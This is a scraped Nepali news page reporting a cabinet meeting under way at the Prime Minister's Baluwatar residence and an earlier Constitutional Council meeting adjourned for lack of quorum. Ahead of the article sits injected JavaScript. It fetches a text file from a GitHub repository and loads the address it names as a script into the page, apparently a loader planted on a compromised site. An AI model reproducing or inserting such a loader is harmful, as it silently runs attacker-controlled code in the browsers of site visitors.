;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); मन्त्रिपरिषद् बैठक अहिले जारी – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • मन्त्रिपरिषद् बैठक अहिले जारी
देश/प्रदेश

मन्त्रिपरिषद् बैठक अहिले जारी

मंसिर ३०,

काठमाडौं । मन्त्रिपरिषद् बैठक अहिले जारी छ ।

मन्त्रिपरिषद् बैठक
मन्त्रिपरिषद् बैठक

प्रधानमन्त्री केपी शर्मा ओलीको सरकारी निवास बालुवाटरमा  बैठक जारी चहेको एक नेताले बताए । आज (मंगलबार) को बैठकले केही महत्वपूर्ण नियुक्ति गर्ने बताइएको छ ।

यसअघि संबैधानिक परिषद्काे बैठकमा विपक्षी दलका नेता देउवा उपस्थित् भएपनि सभामुख अनुपस्थित भएपछि कोरोम नपुगेको भन्दै बैठक स्थगित् गरिएको थियो सोबैठक साँझ ५ बजेको लागि बोलाइएको छ ।

संबैधानिक परिषद्काे बैठक
संबैधानिक परिषद्काे बैठक 

फेसबुक प्रतिक्रियाहरु